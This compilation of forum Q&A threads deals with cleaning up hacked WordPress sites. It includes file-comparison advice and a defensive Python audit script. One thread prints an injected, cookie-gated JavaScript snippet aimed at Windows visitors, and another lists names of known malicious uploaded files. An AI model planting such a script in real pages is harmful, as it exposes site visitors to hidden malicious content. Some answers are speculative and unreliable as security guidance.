An injected link to the website flagged up by Google Search Console - WordPress

I got an email this morning from Google Search Console about 'Social Engineering Content Detected on Your Site' and the link they sent is something like this http://****.co[.]uk/~bettingb/
The website is a WordPress website and I searched for the link in my files and database and I only found it in the Wordfence table wp_wfHits.
Is it possible that Google crawled that link from this table?
Is this something serious?
Any advice?

Before you act upon cjmling's advice, wp_wfHits is a legitimate table created by Wordfence (a security plugin).
As shown here
The fact that it is in this table means that Wordfence has noticed it, which is exactly what you want. I cannot imagine that this is the only place in the database that has this but it may be encoded elsewhere.
The other thing is that Wordfence may have already cleaned up the issue between Google spotting it and you looking into it. I would let Search Console run again and see if it is found again.
DO NOT think that your site has been fully compromised. Change any admin passwords, but you'll probably find that it was stuff added as a comment to a post (the usual WordPress "hack").
Also, if you really want to be secure, change the database prefix (Wordfence, I think, has this option out of the box), which means you are then not using the standard "wp_" prefix and you can spot things more easily!

Related

When I search for my website domain, Google search gives spam links, how to remove them

The website is a WordPress site and it was attacked by an XSS attack. I've already installed Wordfence and MalCare to scan and remove the malicious code and files, but the Google search results still show spam links under the main result. Most of the pages direct to 404 webpages and I was told the Google bot will remove them automatically, but the issue still remains after 4 days. If any expert on this has any solutions and advice, I would much appreciate it.
You can try resubmitting your sitemap to Google in the Search Console.
Otherwise, similarly try using the Google Removals tool to temporarily remove these links; hopefully they will be cleared from the search results by the time the links are restored.
Tutorial: https://support.google.com/webmasters/answer/9689846?hl=en

Downloaded sql file/db as backup, found gibberish that can't be found in wordpress pages or posts. What to do?

I made a couple of wordpress database backups before making some adjustments on a site. Found some new problems, so I checked my work to see if a new problem was something I'd done, or if it wasn't correctly handled on the original site...I did this by opening up the original backup sql file and searching for a word, and saw a whole bunch of inappropriate verbiage in the file. Stuff that has nothing to do with the content of the website. Possibly inflammatory sentences involving politics which I know the site owners would never have put there (they are a retail site).
I ran some checks to see whether or not the site had MalWare, and the software didn't see any warnings.
I checked the pages, posts, and comments on the site, and do not see anything from the sql files on the site itself. The site owners had mentioned in passing that they'd had a site break-in previously. I assumed it had been cleaned up.
Does the stuff that I found in their sql file prove that it hasn't been cleaned up?
What are the best steps to remove that material without breaking the site?
And does this material being in the db negatively impact their SEO?
Your thoughts and advice much appreciated.
1) Does the stuff that I found in their sql file prove that it hasn't been cleaned up?
Not necessarily. The owners may have overwritten posts or restored previous revisions and the bad content you are seeing may actually be in post revisions - which would not be visible.
To verify this: Login to your hosting account, open phpmyadmin, select the database for this website, click the SQL tab and run this query:
SELECT `ID`, `post_content` FROM `wp_posts` WHERE `post_type` = 'revision';
If you see the bad content in the results then what you saw in the SQL file was likely from the revisions.
2) What are the best steps to remove that material without breaking the site?
There are plugins to delete old revisions. See here: https://wordpress.org/plugins/search/delete+revisions/ or (if you are comfortable with doing this) you can directly delete them from the database. Just make sure you backup first!
3) And does this material being in the db negatively impact their SEO?
Old revisions should not be crawled by search engines and should have no impact on SEO.

Google showing "This site might be hacked" under search results

I have a newly installed WordPress copy on my live server, but on Google search it shows a
"this site might be hacked"
message under my site link. I have applied the Search Console verification method of uploading an HTML file into the root folder, but this error is not gone. I checked the Security options tab and it shows a "content injection" spam issue with my site, but I have not found any accurate method to solve that issue.
Carefully follow FAQ - My Site Was Hacked - WordPress Codex.
Then take a look at the recommended security measures in Hardening WordPress - WordPress Codex and Brute Force Attacks - WordPress Codex
Change all passwords. Scan your own PC. Tell your web host you got hacked; and consider changing to a more secure host: Recommended WordPress Web Hosting
You might find this page valuable; it seems to talk specifically about the problem you are referring to with the warning: How to Remove Google Blacklist Warnings
This warning seems to be specific to SEO spam. From what I understand there are many different things that might be contributing to this. I think if you do a Fetch as Google via the console you should see exactly what Google is seeing. These Sucuri folks seem to have another guide that might help you too: How to Clean a WordPress Hack
Good luck, keep us posted

Stop Hacks to Wordpress Site - New User Added

My apologies in advance if I am posting it in the wrong forum.
I have a WordPress site. Every couple of days, a new user is added as an "Administrator" as shown below
I have changed my password many times using complex passwords but to no use. I even searched on Google and have read links like this one.
I have also unchecked the option "Anyone can register"
However, I am unable to stop them from registering.
Fortunately, no malicious activity has been noticed (Ex: Deletions/Unwanted posts etc)
Please advise me on what I can do to stop these?
You clearly have a more serious compromise, like an uploaded malicious script or an unpatched vulnerability. You need to rebuild your site from scratch (clean install of the current versions of WP and any plugins and themes, using a known-good database export) ASAP before something really bad happens.
Unfortunately, it's impossible to say what happened without digging through your server. My guess is that somebody exploited a vulnerability and uploaded a script. It could be anything - a hole in the WP core, a plugin, or a theme; a malicious plugin or theme; a stolen password; a breach of another site on the same server; or a number of other things.
Regardless of what happened, the only safe fix is to rebuild the site. If you have data backups, you can achieve this in a few hours.
I strongly recommend installing the security plugin WordFence to help prevent similar problems in the future. (I have no affiliation with WordFence, but use it on a number of sites.)
Finally, you might want to read this discussion on security.stackexchange.com. The consensus in this situation is "nuke it from orbit." Good luck!
Someone is making a SQL injection in your site.
If you want to prevent this in future, you should do some things.
Rebuild your website from scratch.
Install some of the security plugins, like Bulletproof Security, Wordfence, iThemes Security. I suggest you buy the license of Bulletproof, or use the free version + one of the others. And be careful for the equal settings.
The most common attacks are with SQL injection, XSS, plugin exploits and of course brute-forcing the admin pass. You should upgrade every plugin and WordPress every time you see a new version.
Use fewer plugins. They are one of the main reasons for hacked websites. If you use Linux, I can tell you how to scan your website for vulnerabilities. Or just tell me the URL, and I will tell you the results.
Also change your /wp-admin path; there are a lot of bots that search the web and make brute-force attacks.
It is also important to use an admin username different from admin or Admin. And use strong passwords. It's a good practice, when you make a new WordPress installation, to create two more users. The first will be an Author and will post everything on the site; the second you should make with the Administrator role. After that, delete the first admin user and start using the new one.
Hackers know that almost every time the user with id:1 is the admin, so they can try to access again. So in this case your admin will be with id:3, and again don't use a username like admin etc.
Best regards and wish you luck.
Kasmetski
Check index.php, wp-admin/index.php to see if they have been modified. Usually the following line of code is added to the top of the index.php file. A code starting with 'required' is usually added.
The file being ‘required’/’included’ here contains malicious code which is executed along with each run of WordPress. Such code can generate fake pharma pages, Japanese SEO spam pages and other malware infections.
Delete the #require code from the file after comparing it with the contents of the core WP files from its GitHub repository.
Check if there are any new files in the root of the server or /wp-admin folder that were not created by you. Some of the files that you may find are:
Marvins.php
db_.php
8c18ee
83965
admin.php
buddy.zip
dm.php
If you find any of the above suspicious files, take a backup and delete them.
Source: https://www.getastra.com/blog/911/fix-wordpress-admin-dashboard-wp-admin-hack/
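The comparison this answer describes (index.php against the core copy, plus new files in the root and /wp-admin), as an added Python example that is not part of the original answer or its source. It assumes a clean copy of the same WordPress version has been unpacked beside the live tree; `includes`, `audit` and `build_demo` are hypothetical names and the demo trees are constructed.

```python
import re
import tempfile
from pathlib import Path

# require/include statements, including @-silenced ones placed right after "<?php".
INCLUDE_RE = re.compile(r"(?<![\w$>])(?:require|include)(?:_once)?\b[^;]*;")
SITE_OWN = {"wp-config.php", ".htaccess"}  # legitimately absent from a clean copy
CHECKED_DIRS = ("", "wp-admin")  # document root and /wp-admin

def includes(php_file):
    """Whitespace-normalised require/include statements in a PHP file."""
    text = Path(php_file).read_text(errors="replace")
    return {" ".join(m.split()) for m in INCLUDE_RE.findall(text)}

def audit(site_root, clean_root):
    """Diff a live tree against a clean copy of the same WordPress version."""
    site_root, clean_root = Path(site_root), Path(clean_root)
    report = {"added_includes": {}, "extra_files": []}
    for sub in CHECKED_DIRS:
        site_dir, clean_dir = site_root / sub, clean_root / sub
        added = includes(site_dir / "index.php") - includes(clean_dir / "index.php")
        if added:
            report["added_includes"][str(Path(sub) / "index.php")] = sorted(added)
        known = {p.name for p in clean_dir.iterdir() if p.is_file()} | SITE_OWN
        for p in sorted(site_dir.iterdir()):
            if p.is_file() and p.name not in known:
                report["extra_files"].append(str(Path(sub) / p.name))
    return report

def build_demo(base):
    """Constructed sample trees; file names taken from the list in the answer."""
    clean, site = Path(base) / "clean", Path(base) / "site"
    for root in (clean, site):
        (root / "wp-admin").mkdir(parents=True)
        (root / "index.php").write_text("<?php\nrequire __DIR__ . '/wp-blog-header.php';\n")
        (root / "wp-admin" / "index.php").write_text("<?php\nrequire_once __DIR__ . '/admin.php';\n")
        (root / "wp-admin" / "admin.php").write_text("<?php // core file\n")
    (site / "wp-config.php").write_text("<?php // site settings\n")
    (site / "index.php").write_text(  # tampered: extra require on the first line
        "<?php @require '/constructed/path/db_.php';\nrequire __DIR__ . '/wp-blog-header.php';\n")
    (site / "dm.php").write_text("<?php // stand-in\n")
    (site / "wp-admin" / "Marvins.php").write_text("<?php // stand-in\n")
    return site, clean

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(audit(*build_demo(tmp)))
```

Where WP-CLI is installed, `wp core verify-checksums` performs a fuller comparison of core files against the official checksums.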

What is this? Google analytics cookie or malware?

I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
That URL at the end is super suspicious. I googled but found no leads :-(
I haven't yet found the source of the code in my WP installation. It's not written into the template files or database. In the process of updating WP install now.
Does anyone have any knowledge of this?
That looks strange to me. Maybe try reinstalling WordPress and choose very complex passwords so nobody unauthorized can access your site. You might want to remove the Google Analytics code from the page and see if that makes a difference. Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of. Make sure it is longer than 8 letters. If your site is infected, take it down from the web NOW until you're sure it's not.
